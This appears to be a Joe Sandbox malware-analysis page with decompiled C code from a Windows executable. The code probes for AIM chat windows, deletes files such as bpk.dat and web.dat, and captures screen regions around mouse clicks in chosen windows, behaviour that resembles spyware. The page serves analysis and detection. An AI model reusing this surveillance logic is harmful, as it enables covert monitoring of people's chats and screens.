Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #537BuffCharDateFormatUpper
String ID: dddd, d MMMM
API String ID: 2423585594-105496283
Opcode ID: 3c052a69963cfdfaac25dbe1050f1dadaad5edd881074f0bead04f97d299ab8e
Instruction ID: 7d7aa03fcd28e46fa82bf98781ac0401ed261906eab1b52d3a0f3e318760c2b6
Opcode Fuzzy Hash: 3c052a69963cfdfaac25dbe1050f1dadaad5edd881074f0bead04f97d299ab8e
Instruction Fuzzy Hash: 0FE0D834251614BFD701AB54EC0AEEE3F6CDB56351F008016FD049B182D2B09A408BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00409941, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409941(struct HWND__* _a4, char* _a8) {
				struct HWND__* _t6;

				if(_a4 != 0) {
					_t6 = strncmp(_a8, "AIM_ChatWnd", 0xb);
					if(_t6 != 0) {
						goto L1;
					}
					return FindWindowExA(_a4, _t6, "WndAte32Class", _t6) & 0xffffff00 | _t8 != 0x00000000;
				}
				L1:
				return 0;
			}

0x00409946
0x00409957
0x00409962
0x00000000
0x00000000
0x00000000
0x00409977
0x00409948
0x00000000

APIs

strncmp.MSVCRT(?,AIM_ChatWnd,0000000B), ref: 00409957
FindWindowExA.USER32 ref: 0040996F

Strings

WndAte32Class, xrefs: 00409965
AIM_ChatWnd, xrefs: 0040994E

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: FindWindowstrncmp
String ID: AIM_ChatWnd$WndAte32Class
API String ID: 208138901-2761603339
Opcode ID: 3053c84f1e2105bb53ace6ed7ebf452885d5fda13c75b3593e4fde11f685bb40
Instruction ID: cb7ca0d52a5966aa19f3e467fb5f35b8835785df629a20fd39cafd1ba30d1d2b
Opcode Fuzzy Hash: 3053c84f1e2105bb53ace6ed7ebf452885d5fda13c75b3593e4fde11f685bb40
Instruction Fuzzy Hash: 60E01270245301BBDA114F208D05F2B7798BF62757F115839F841A11E2E7798D58A51A

Uniqueness

Uniqueness Score: -1.00%

Function 004254F6, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18
fileCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E004254F6(void* __ecx) {
				char _v8;
				CHAR** _t3;
				int _t4;

				_push("web.dat");
				_t3 =  &_v8;
				_push(0x4558c4);
				_push(_t3);
				L0043DE20();
				_t4 = DeleteFileA( *_t3);
				L0043DD36();
				return _t4;
			}

0x004254fb
0x00425500
0x00425503
0x00425508
0x00425509
0x00425510
0x0042551b
0x00425524

APIs

#924.MFC42(?,004558C4,web.dat), ref: 00425509
DeleteFileA.KERNEL32(00000000,?,004558C4,web.dat), ref: 00425510
#800.MFC42 ref: 0042551B

Strings

web.dat, xrefs: 004254FB

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800#924DeleteFile
String ID: web.dat
API String ID: 1881785514-735436589
Opcode ID: b07bfbcd40ec766908a282f45b59da3f5db8a169484509241ad118c0179d5222
Instruction ID: 083fdd1eca76ce47c3ed29ae509cfd1e7edfcc771fe56ae29ca77c7932b5ff7e
Opcode Fuzzy Hash: b07bfbcd40ec766908a282f45b59da3f5db8a169484509241ad118c0179d5222
Instruction Fuzzy Hash: 40D0A53190021477CF00F7D1DC0FDCD77ACD9457557100065F40197251F978DE048758

Uniqueness

Uniqueness Score: -1.00%

Function 004207A5, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18
fileCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E004207A5(void* __ecx) {
				char _v8;
				CHAR** _t3;
				int _t4;

				_push("bpk.dat");
				_t3 =  &_v8;
				_push(0x4558c4);
				_push(_t3);
				L0043DE20();
				_t4 = DeleteFileA( *_t3);
				L0043DD36();
				return _t4;
			}

0x004207aa
0x004207af
0x004207b2
0x004207b7
0x004207b8
0x004207bf
0x004207ca
0x004207d3

APIs

#924.MFC42(?,004558C4,bpk.dat), ref: 004207B8
DeleteFileA.KERNEL32(00000000,?,004558C4,bpk.dat), ref: 004207BF
#800.MFC42 ref: 004207CA

Strings

bpk.dat, xrefs: 004207AA

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800#924DeleteFile
String ID: bpk.dat
API String ID: 1881785514-1077452061
Opcode ID: 5814627e9496be0ba8389cb6d060ff54c42908c6a52d5e4f70c89e7c7287d9b5
Instruction ID: 6bccd8d09e4ed4bc64830cdae4975ff247b46f9734bb78c9c44c6dd1ff5c47eb
Opcode Fuzzy Hash: 5814627e9496be0ba8389cb6d060ff54c42908c6a52d5e4f70c89e7c7287d9b5
Instruction Fuzzy Hash: A4D0A5319002147BCF00B7E1DC0FDCD77ACD9057557100066F401A7251F9789E048798

Uniqueness

Uniqueness Score: -1.00%

Function 00425013, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00425013() {
				CHAR** _t6;
				void* _t10;

				_push("temporary.bmp");
				 *((intOrPtr*)(_t10 - 0x28)) =  *((intOrPtr*)(_t10 - 0x14));
				_t6 = _t10 + 8;
				_push(0x4558c8);
				_push(_t6);
				L0043DE20();
				DeleteFileA( *_t6);
				L0043DD36();
				 *0x4558fc =  *0x4558fc & 0x00000000;
				return E00425049;
			}

0x00425016
0x0042501b
0x0042501e
0x00425021
0x00425026
0x00425027
0x0042502e
0x00425037
0x0042503c
0x00425048

APIs

#924.MFC42(?,004558C8,temporary.bmp), ref: 00425027
DeleteFileA.KERNEL32(00000000,?,004558C8,temporary.bmp), ref: 0042502E
#800.MFC42 ref: 00425037

Strings

temporary.bmp, xrefs: 00425016

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800#924DeleteFile
String ID: temporary.bmp
API String ID: 1881785514-3513714439
Opcode ID: 8ecbde0bf26b1ff00615f5aebabae8c03f8d890d182c49cdfffdd8042b4a3e11
Instruction ID: d23c2a483fbdf0ae250a4e8aba821d92d1509fad5f29a58f9d4a0763c4f97612
Opcode Fuzzy Hash: 8ecbde0bf26b1ff00615f5aebabae8c03f8d890d182c49cdfffdd8042b4a3e11
Instruction Fuzzy Hash: DDD01731940609ABCB00EF90D85AADE3BB4EB19306F50902AF000AA1A1DB7C9A588F58

Uniqueness

Uniqueness Score: -1.00%

Function 004102F8, Relevance: 6.2, APIs: 4, Instructions: 241
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E004102F8(intOrPtr __ecx) {
				intOrPtr _t128;
				intOrPtr* _t129;
				intOrPtr* _t131;
				intOrPtr* _t133;
				intOrPtr* _t134;
				intOrPtr* _t151;
				intOrPtr _t152;
				intOrPtr _t154;
				intOrPtr* _t155;
				intOrPtr* _t158;
				intOrPtr _t161;
				intOrPtr* _t162;
				intOrPtr _t189;
				intOrPtr _t191;
				intOrPtr _t200;
				intOrPtr* _t201;
				intOrPtr _t204;
				intOrPtr* _t205;
				intOrPtr _t206;
				intOrPtr* _t207;
				intOrPtr _t210;
				intOrPtr* _t212;
				signed int _t213;
				intOrPtr* _t215;
				intOrPtr* _t217;
				intOrPtr _t218;
				void* _t220;

				E0043E4E0(0x4404a5, _t220);
				 *((intOrPtr*)(_t220 - 0x10)) = __ecx;
				_t212 =  *((intOrPtr*)(_t220 + 0xc));
				E004107BC(_t220 + 0xc);
				_t217 =  *_t212;
				_t128 =  *0x4553c0; // 0x2acaa0
				_t151 = _t212 + 8;
				 *((intOrPtr*)(_t220 - 0x14)) = _t212;
				 *((intOrPtr*)(_t220 - 0x18)) = _t151;
				if(_t217 != _t128) {
					_t158 =  *_t151;
					if(_t158 == _t128) {
						goto L6;
					} else {
						goto L3;
					}
					while(1) {
						L3:
						_t210 =  *_t158;
						if(_t210 == _t128) {
							break;
						}
						_t158 = _t210;
					}
					_t217 =  *((intOrPtr*)(_t158 + 8));
					 *((intOrPtr*)(_t220 - 0x14)) = _t158;
					 *((intOrPtr*)(_t220 - 0x18)) = _t158 + 8;
					goto L6;
				} else {
					_t217 =  *_t151;
					L6:
					__imp__??0_Lockit@std@@QAE@XZ();
					_t129 =  *((intOrPtr*)(_t220 - 0x14));
					 *(_t220 - 4) =  *(_t220 - 4) & 0x00000000;
					if(_t129 == _t212) {
						_t204 =  *((intOrPtr*)(_t220 - 0x10));
						 *((intOrPtr*)(_t217 + 4)) =  *((intOrPtr*)(_t129 + 4));
						_t161 =  *((intOrPtr*)(_t204 + 4));
						if( *((intOrPtr*)(_t161 + 4)) != _t212) {
							_t162 =  *((intOrPtr*)(_t212 + 4));
							if( *_t162 != _t212) {
								 *((intOrPtr*)(_t162 + 8)) = _t217;
							} else {
								 *_t162 = _t217;
							}
						} else {
							 *((intOrPtr*)(_t161 + 4)) = _t217;
						}
						_t205 =  *((intOrPtr*)(_t204 + 4));
						 *((intOrPtr*)(_t220 - 0x18)) = _t205;
						if( *_t205 != _t212) {
							L28:
							_t206 =  *((intOrPtr*)( *((intOrPtr*)(_t220 - 0x10)) + 4));
							if( *((intOrPtr*)(_t206 + 8)) != _t212) {
								L35:
								_t152 =  *((intOrPtr*)(_t220 - 0x10));
								L36:
								_t213 = 1;
								if( *((intOrPtr*)(_t129 + 0x38)) != _t213) {
									L57:
									 *(_t220 - 4) =  *(_t220 - 4) | 0xffffffff;
									__imp__??1_Lockit@std@@QAE@XZ();
									_t218 =  *((intOrPtr*)(_t220 - 0x14));
									E0040F755(_t218 + 0x18);
									_push(_t218);
									L0043DD42();
									_t131 =  *((intOrPtr*)(_t220 + 8));
									 *((intOrPtr*)(_t152 + 0xc)) =  *((intOrPtr*)(_t152 + 0xc)) - 1;
									 *_t131 =  *((intOrPtr*)(_t220 + 0xc));
									 *[fs:0x0] =  *((intOrPtr*)(_t220 - 0xc));
									return _t131;
								}
								while(_t217 !=  *((intOrPtr*)( *((intOrPtr*)(_t152 + 4)) + 4)) &&  *(_t217 + 0x38) == _t213) {
									_t133 =  *((intOrPtr*)(_t217 + 4));
									if(_t217 !=  *_t133) {
										_t134 =  *_t133;
										if( *(_t134 + 0x38) == 0) {
											 *(_t134 + 0x38) = _t213;
											 *( *((intOrPtr*)(_t217 + 4)) + 0x38) =  *( *((intOrPtr*)(_t217 + 4)) + 0x38) & 0x00000000;
											E00410A77(_t152,  *((intOrPtr*)(_t217 + 4)));
											_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t217 + 4))));
										}
										if( *( *((intOrPtr*)(_t134 + 8)) + 0x38) != _t213 ||  *( *_t134 + 0x38) != _t213) {
											if( *( *_t134 + 0x38) == _t213) {
												 *( *((intOrPtr*)(_t134 + 8)) + 0x38) = _t213;
												 *(_t134 + 0x38) =  *(_t134 + 0x38) & 0x00000000;
												E00410A33(_t152, _t134);
												_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t217 + 4))));
											}
											 *(_t134 + 0x38) =  *( *((intOrPtr*)(_t217 + 4)) + 0x38);
											 *( *((intOrPtr*)(_t217 + 4)) + 0x38) = _t213;
											 *( *_t134 + 0x38) = _t213;
											E00410A77(_t152,  *((intOrPtr*)(_t217 + 4)));
											break;
										} else {
											L49:
											 *(_t134 + 0x38) =  *(_t134 + 0x38) & 0x00000000;
											_t217 =  *((intOrPtr*)(_t217 + 4));
											continue;
										}
									}
									_t134 =  *((intOrPtr*)(_t133 + 8));
									if( *(_t134 + 0x38) == 0) {
										 *(_t134 + 0x38) = _t213;
										 *( *((intOrPtr*)(_t217 + 4)) + 0x38) =  *( *((intOrPtr*)(_t217 + 4)) + 0x38) & 0x00000000;
										E00410A33(_t152,  *((intOrPtr*)(_t217 + 4)));
										_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t217 + 4)) + 8));
									}
									if( *( *_t134 + 0x38) != _t213 ||  *( *((intOrPtr*)(_t134 + 8)) + 0x38) != _t213) {
										if( *( *((intOrPtr*)(_t134 + 8)) + 0x38) == _t213) {
											 *( *_t134 + 0x38) = _t213;
											 *(_t134 + 0x38) =  *(_t134 + 0x38) & 0x00000000;
											E00410A77(_t152, _t134);
											_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t217 + 4)) + 8));
										}
										 *(_t134 + 0x38) =  *( *((intOrPtr*)(_t217 + 4)) + 0x38);
										 *( *((intOrPtr*)(_t217 + 4)) + 0x38) = _t213;
										 *( *((intOrPtr*)(_t134 + 8)) + 0x38) = _t213;
										E00410A33(_t152,  *((intOrPtr*)(_t217 + 4)));
										break;
									} else {
										goto L49;
									}
								}
								 *(_t217 + 0x38) = _t213;
								goto L57;
							}
							_t189 =  *0x4553c0; // 0x2acaa0
							if( *_t212 != _t189) {
								_t154 =  *((intOrPtr*)(_t217 + 8));
								_t215 = _t217;
								while(_t154 != _t189) {
									_t215 = _t154;
									_t154 =  *((intOrPtr*)(_t215 + 8));
								}
								 *((intOrPtr*)(_t206 + 8)) = _t215;
								goto L35;
							}
							 *((intOrPtr*)(_t206 + 8)) =  *((intOrPtr*)(_t212 + 4));
							goto L35;
						} else {
							_t191 =  *0x4553c0; // 0x2acaa0
							if( *_t151 != _t191) {
								_t207 =  *_t217;
								_t155 = _t217;
								while(_t207 != _t191) {
									_t155 = _t207;
									_t207 =  *_t155;
								}
								 *((intOrPtr*)( *((intOrPtr*)(_t220 - 0x18)))) = _t155;
								goto L28;
							}
							 *_t205 =  *((intOrPtr*)(_t212 + 4));
							goto L28;
						}
					}
					 *((intOrPtr*)( *_t212 + 4)) = _t129;
					 *_t129 =  *_t212;
					if(_t129 !=  *_t151) {
						 *((intOrPtr*)(_t217 + 4)) =  *((intOrPtr*)(_t129 + 4));
						 *((intOrPtr*)( *((intOrPtr*)(_t129 + 4)))) = _t217;
						 *((intOrPtr*)( *((intOrPtr*)(_t220 - 0x18)))) =  *_t151;
						 *((intOrPtr*)( *_t151 + 4)) = _t129;
					} else {
						 *((intOrPtr*)(_t217 + 4)) = _t129;
					}
					_t152 =  *((intOrPtr*)(_t220 - 0x10));
					_t200 =  *((intOrPtr*)(_t152 + 4));
					if( *((intOrPtr*)(_t200 + 4)) != _t212) {
						_t201 =  *((intOrPtr*)(_t212 + 4));
						if( *_t201 != _t212) {
							 *((intOrPtr*)(_t201 + 8)) = _t129;
						} else {
							 *_t201 = _t129;
						}
					} else {
						 *((intOrPtr*)(_t200 + 4)) = _t129;
					}
					 *((intOrPtr*)(_t220 - 0x14)) = _t212;
					 *((intOrPtr*)(_t129 + 4)) =  *((intOrPtr*)(_t212 + 4));
					 *((intOrPtr*)(_t129 + 0x38)) =  *((intOrPtr*)(_t212 + 0x38));
					 *((intOrPtr*)(_t212 + 0x38)) =  *((intOrPtr*)(_t129 + 0x38));
					_t129 = _t212;
					goto L36;
				}
			}

0x004102fd
0x00410306
0x0041030b
0x00410311
0x00410316
0x00410318
0x0041031d
0x00410322
0x00410325
0x00410328
0x0041032e
0x00410332
0x00000000
0x00000000
0x00000000
0x00000000
0x00410334
0x00410334
0x00410334
0x00410338
0x00000000
0x00000000
0x0041033a
0x0041033a
0x0041033e
0x00410344
0x00410347
0x00000000
0x0041032a
0x0041032a
0x0041034a
0x0041034d
0x00410353
0x00410356
0x0041035c
0x004103c4
0x004103c7
0x004103ca
0x004103d0
0x004103d7
0x004103dc
0x004103e2
0x004103de
0x004103de
0x004103de
0x004103d2
0x004103d2
0x004103d2
0x004103e5
0x004103e8
0x004103ed
0x00410413
0x00410416
0x0041041c
0x00410443
0x00410443
0x00410446
0x00410448
0x0041044c
0x0041055d
0x0041055d
0x00410564
0x0041056a
0x00410570
0x00410575
0x00410576
0x0041057b
0x0041057e
0x00410587
0x0041058d
0x00410595
0x00410595
0x00410452
0x00410467
0x0041046c
0x004104a2
0x004104a8
0x004104aa
0x004104b2
0x004104b9
0x004104c1
0x004104c1
0x004104c9
0x00410523
0x00410529
0x0041052c
0x00410532
0x0041053a
0x0041053a
0x00410542
0x00410548
0x0041054f
0x00410555
0x00000000
0x004104d2
0x004104d2
0x004104d2
0x004104d6
0x00000000
0x004104d6
0x004104c9
0x0041046e
0x00410475
0x00410477
0x0041047f
0x00410486
0x0041048e
0x0041048e
0x00410496
0x004104e4
0x004104e9
0x004104ec
0x004104f2
0x004104fa
0x004104fa
0x00410503
0x00410509
0x00410511
0x00410517
0x00000000
0x004104a0
0x00000000
0x004104a0
0x00410496
0x0041055a
0x00000000
0x0041055a
0x0041041e
0x00410426
0x00410430
0x00410433
0x00410435
0x00410439
0x0041043b
0x0041043b
0x00410440
0x00000000
0x00410440
0x0041042b
0x00000000
0x004103ef
0x004103ef
0x004103f7
0x00410400
0x00410402
0x00410404
0x00410408
0x0041040a
0x0041040a
0x00410411
0x00000000
0x00410411
0x004103fc
0x00000000
0x004103fc
0x004103ed
0x00410360
0x00410365
0x00410369
0x00410376
0x0041037c
0x00410380
0x00410384
0x0041036b
0x0041036b
0x0041036b
0x00410387
0x0041038a
0x00410390
0x00410397
0x0041039c
0x004103a2
0x0041039e
0x0041039e
0x0041039e
0x00410392
0x00410392
0x00410392
0x004103a8
0x004103ab
0x004103b4
0x004103b7
0x004103ba
0x00000000
0x004103ba

APIs

__EH_prolog.LIBCMT ref: 004102FD
??0_Lockit@std@@QAE@XZ.MSVCP60(?), ref: 0041034D
??1_Lockit@std@@QAE@XZ.MSVCP60 ref: 00410564
#825.MFC42(?), ref: 00410576

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Lockit@std@@$#825??0_??1_H_prolog
String ID:
API String ID: 1282909303-0
Opcode ID: 1ed3e3f7af75b9e6f1af1d81173e218046e5336f39c051684af23e3de8ab1d6c
Instruction ID: cff458cac2664b2f8d9bc6442b97688300a68c28ddb1ea6c20e2d82f3775edd0
Opcode Fuzzy Hash: 1ed3e3f7af75b9e6f1af1d81173e218046e5336f39c051684af23e3de8ab1d6c
Instruction Fuzzy Hash: 5DB1C074A00605CFCB15CF05C1D09AAB7B2FF98324B6490AED55A9B762D7B5ECC2CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00421E37, Relevance: 6.1, APIs: 4, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00421E37(void* __ecx, intOrPtr _a4) {
				struct tagRECT _v20;
				struct tagPOINT _v28;
				char _v540;
				void* _t37;
				void* _t45;
				signed int _t56;
				intOrPtr _t60;
				intOrPtr _t62;
				long _t63;
				intOrPtr _t65;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t74;
				intOrPtr _t77;
				struct HWND__* _t85;
				void* _t86;

				_t86 = __ecx;
				_t60 = _a4;
				if(_t60 == 0x201 || _t60 == 0xa1) {
					if( *((intOrPtr*)(_t86 + 0x1800)) == 0) {
						goto L35;
					}
					goto L3;
				} else {
					L3:
					if(_t60 == 0x204 || _t60 == 0xa4) {
						if( *((intOrPtr*)(_t86 + 0x1801)) == 0) {
							goto L35;
						}
						goto L6;
					} else {
						L6:
						if(_t60 == 0x207 || _t60 == 0xa7 || _t60 == 0x20a) {
							if( *((intOrPtr*)(_t86 + 0x1802)) == 0) {
								goto L35;
							}
							goto L10;
						} else {
							L10:
							if( *((intOrPtr*)(_t86 + 0x17f2)) == 0 ||  *((intOrPtr*)(_t86 + 0x17e5)) == 0 ||  *((intOrPtr*)(_t86 + 0x64)) == 0 ||  *((intOrPtr*)(_t86 + 0x17df)) == 0) {
								L35:
								_t37 = 1;
								return _t37;
							} else {
								if(_t60 != 0x20a) {
									L16:
									 *(_t86 + 0x2730) =  *(_t86 + 0x2730) + 1;
									if( *(_t86 + 0x2730) %  *(_t86 + 0x1d44) != 0) {
										goto L35;
									}
									_t85 = GetForegroundWindow();
									if( *((intOrPtr*)(_t86 + 0x17f3)) == 0) {
										L20:
										GetCursorPos( &_v28);
										_t77 =  *((intOrPtr*)(_t86 + 0x1a10));
										_t45 = 0;
										_t62 = _t77;
										if(_t62 == 0) {
											_push(0x19);
											L30:
											_pop(_t45);
											L31:
											if(_t77 != 5) {
												_t63 = _v28.x;
												_v20.right = _t63 + _t45;
												_t65 = _v28.y;
												_v20.left = _t63 - _t45;
												_v20.top = _t65 - _t45;
												_v20.bottom = _t65 + _t45;
											} else {
												GetWindowRect(_t85,  &_v20);
											}
											E00428FAA( &_v20);
											E00425177(_t86,  &_v20);
											goto L35;
										}
										_t69 = _t62 - 1;
										if(_t69 == 0) {
											_push(0x32);
											goto L30;
										}
										_t70 = _t69 - 1;
										if(_t70 == 0) {
											_push(0x64);
											goto L30;
										} else {
											_t71 = _t70 - 1;
											if(_t71 == 0) {
												_t45 = 0x96;
											} else {
												if(_t71 == 1) {
													_t45 = 0xc8;
												}
											}
											goto L31;
										}
									}
									if(_t85 == 0) {
										goto L35;
									}
									GetWindowTextA(_t85,  &_v540, 0x1ff);
									if(E0042859F(_t86 + 0xd50,  &_v540) == 0) {
										goto L35;
									}
									goto L20;
								}
								 *0x455ac4 =  *0x455ac4 + 1;
								_t56 =  *0x455ac4; // 0x0
								asm("cdq");
								_t74 = 7;
								if(_t56 % _t74 != 0) {
									goto L35;
								}
								goto L16;
							}
						}
					}
				}
			}

0x00421e42
0x00421e46
0x00421e50
0x00421e60
0x00000000
0x00000000
0x00000000
0x00421e66
0x00421e66
0x00421e6c
0x00421e7c
0x00000000
0x00000000
0x00000000
0x00421e82
0x00421e82
0x00421e8d
0x00421ea1
0x00000000
0x00000000
0x00000000
0x00421ea7
0x00421ea7
